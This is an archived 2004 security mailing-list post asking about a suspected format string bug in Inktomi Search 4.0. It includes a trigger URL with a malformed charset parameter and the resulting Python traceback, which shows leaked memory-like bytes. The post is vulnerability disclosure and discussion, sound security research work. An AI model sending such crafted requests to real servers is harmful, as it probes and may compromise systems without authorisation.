Format String vuln in Inktomi Search4.0

From: Blurred Vision (really_blurred_vision_at_hotmail.com)
Date: 02/26/04

  • Next message: Andrey Smirnov: "Extremail Security Problem" 
    To: vuln-dev@securityfocus.com, pen-test@securityfocus.com
Date: Fri, 27 Feb 2004 08:17:54 +1100

    Besides the discussion found here:
    http://lists.virus.org/dw-0day-0306/msg00071.html

    Which confirms the existance of a format string bug, has anyone seen anymore
    on the following FS bug in inktomi search?

    URL: http://>/query.html?charset=%3

    Internal Server Error
    Server cannot complete operation
    exceptions.UnicodeError: unknown encoding 0'<meta htPk k u': ', u'Server
    cannot complete operati
      File httpsrvr.py, line 501, in parse_qs
        charset = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot
    comple
        enclst = [('charset', ["0'<meta htPk\031\002\240k\031\002 u': ',
    u'Server
        ent = ['charset', '%3']
        idx = 0
        key = 'charset'
        lst = ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot
    complete
        nodecode = []
        qs = 'charset=%3'
        query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server
    ca
        self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
        val = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot complete
    o
      File httpsrvr.py, line 778, in handle
        frag = ''
        netloc = '<vuln_inktomisearch_server>'
        parms = ''
        path = '/query.html'
        qs = 'charset=%3'
        query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server
    ca
        req = ''
        scheme = 'http'
        self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
        server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>
        thr = 413
      File httpsrvr.py, line 904, in __init__
        client_address = ('XXX.XXX.XXX.XXX', 56730)
        sckt = <socket._socketobject instance at 21957c0>
        self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
        server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>

    _________________________________________________________________
    Hot chart ringtones and polyphonics. Go to
    http://ninemsn.com.au/mobilemania/default.asp

  • Next message: Andrey Smirnov: "Extremail Security Problem"

    Relevant Pages

    • Format String vuln in Inktomi Search4.0
      ... Which confirms the existance of a format string bug, has anyone seen anymore ... on the following FS bug in inktomi search? ... Internal Server Error ...
      (Pen-Test)
    • Format String vuln in Inktomi Search4.0
      ... Which confirms the existance of a format string bug, ... on the following FS bug in inktomi search? ... RESPONSE: ... Internal Server Error ...
      (Bugtraq)